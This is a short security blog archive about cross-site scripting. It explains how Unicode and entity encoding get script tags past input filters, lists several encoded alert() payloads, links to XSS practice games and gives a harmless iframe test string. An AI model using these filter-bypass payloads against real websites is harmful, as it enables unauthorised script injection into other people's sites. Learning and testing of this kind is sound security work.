Category Archives: XSS

XSS

One of my favorite ways to bypass XSS input filters is with Unicode characters. What happens is the string like “%26#60;script%26#62;alert(1);%26#60;/script%26#62;” is sent to the server. The input filters find nothing wrong with it so it passes through fine. When it hits the web server, it attempts to normailze the characters and subsitutes approximates. So &#60; or &#x3c; will become “<“.

Here are a few Unicode strings that I will try out.

%3Cscript%3Ealert(0)%3C/script%3E
%3E%22%27%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E
%26#60;script%26#62;alert(1);%26#60;/script%26#62;
%uff1cscript>alert(1)%uff1c/script>
&#x3c;script>alert(0)&#x3c;/script> 
0x3C;script>alert(0)&#60;/script> 
\074\057a\076\047\074script\076 alert(1) \074/script\076 // 
%3E%22%27%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E
\x3cscript\x3ealert(1)\x3c/script\x3e

 

Playing with XSS

Want to learn more about XSS attacks – well the best way is probably to try some yourself. Here are two sites that offer XSS games that allow you to test and improve your skills.
https://xss-game.appspot.com/
http://escape.alf.nu

One of my favorite strings to use in testing XSS when I am doing pen testing is the following:
<iframe src=//www.youtube.com/embed/dQw4w9WgXcQ></iframe>
It will add an embedded iframe for the youtube video Rick Roll. 🙂 Its always amusing to see all the places I can get a Rick Roll to appear.
BTW, to keep the link from rendering, I had to HTML endode < to &lt;, and for good measure also change > to &gt; and change the & in &lt; to &amp;.